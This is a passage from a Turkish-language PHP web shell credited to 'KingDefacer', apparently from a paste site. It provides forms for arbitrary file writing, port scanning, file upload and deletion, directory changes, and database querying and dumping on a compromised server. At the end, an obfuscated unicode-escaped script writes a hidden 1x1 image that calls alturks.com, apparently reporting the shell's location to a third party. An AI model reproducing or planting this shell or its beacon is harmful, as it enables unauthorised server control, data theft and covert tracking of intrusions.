  639. $fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
  640. fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
  641. fclose($fh);
  642. echo "Done.</td></tr>";
  643. }
  644. echo "
  645. </table>
  646. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  647. <tr>
  648. <td valign=top>
  649. <center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
  650. <form name='directory' method='post' action=''>
  651. <input type='text' name='dir' value=$dir>
  652. <input type='submit' value='Go'>
  653. </form></td><td>
  654. <center><b><font size='2' face='Verdana'> Port Tarayýcý <br></font></b>
  655.   <form name='scanner' method='post'>
  656.   <input type='text' name='host' value='127.0.0.1' >
  657.   <select name='protocol'>
  658.   <option value='tcp'>tcp</option>
  659.   <option value='udp'>udp</option>
  660.   </select>
  661.   <input type='submit' value='Portlarý TARA'>
  662.   </form>
  663. ";
  664. if(isset($host) && isset($proto))
  665. {
  666. echo "<font size='2' face='Verdana'>Open Ports:";
  667.  
  668. for($current = 0; $current <= 23; $current++)
  669. {
  670. $currents = $myports[$current];
  671.  
  672. $service = getservbyport($currents, $proto);
  673.  
  674.  
  675. // Try to connect to port
  676. $result = fsockopen($host, $currents, $errno, $errstr, 1);
  677.  
  678. // Show results
  679. if($result)
  680. {
  681. echo "$currents, ";
  682. }
  683.  
  684.  
  685. }
  686. }
  687.  
  688. echo "</font>
  689. </td></tr>
  690.  
  691. <tr>
  692. <td valign=top width=50%>
  693. <center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
  694.   <form method='post' action='' enctype='multipart/form-data'>
  695.   <input type='hidden' name='dare' value=$dir>
  696.   <input type='file' name='ffile'>
  697.   <input type='submit' name='ok' value='Upload!'>
  698.   </center>  
  699.   </form>
  700. </td>
  701. <td valign=top>
  702. <center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
  703.   <form method='post' action=''>
  704.   <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayý Sil' name='deletfilez'>
  705.   </center>
  706.   </form>
  707. </td></tr>
  708. <tr>
  709. <td valign=top>
  710.  
  711. <center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b>
  712.   <form method='post' action=''>
  713.   <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluþtur'>
  714.   </center>
  715.   </form>
  716. </td>
  717. <td valign=top>
  718. <center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>
  719.   <form method='post' action=''>
  720.   <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
  721.   </center>
  722.   </form>
  723. </td></tr>
  724. <tr>
  725. <td valign=top width=50%>
  726. <center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b>
  727.   <form method='post' action=''>
  728.   <input type='hidden' name='darezz' value=$dir>
  729.   <font size='1' face='Verdana'>ADI:</font><br>
  730.   <input type='text' name='names' size='30'><br>
  731.   <font size='1' face='Verdana'>Kodu:</font><br>
  732.   <textarea rows='16' cols='30' name='source'></textarea><br>
  733.   <input type='submit' value='Upload'>
  734.   </center>
  735.   </form>
  736. </td>
  737. <td valign=top width=50%>
  738. <center><b><font size='2' face='Verdana'>Database<br></font></b>
  739.   <form method='post' action=''>
  740.   <font size='1' face='Verdana'>Username: - Password:</font><br>
  741.   <input type='text' name='user' size='10'>
  742.   <input type='text' name='passd' size='10'><br>
  743.   <font size='1' face='Verdana'>Host:</font><br>
  744.   <input type='text' name='host' value='localhost'><br>
  745.   <font size='1' face='Verdana'>DB Name:</font><br>
  746.   <input type='text' name='db'><br>
  747.   <font size='1' face='Verdana'>Sorgu:</font><br>
  748.   <textarea rows='10' cols='30' name='query'></textarea><br>
  749.   <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
  750.   </center>
  751.   </form>
  752. </td> </tr>
  753.  
  754. </table>
  755. </table>
  756. <br />
  757. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  758. <tr>
  759. <td valign=top>
  760. <center><b><font size='1' face='Verdana'>
  761. KingDefacer@msn.com
  762. </center></font></td></tr>
  763. </body>
  764. </html>";
  765.  
  766. ?>
  767. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Add Comment
Please, Sign In to add comment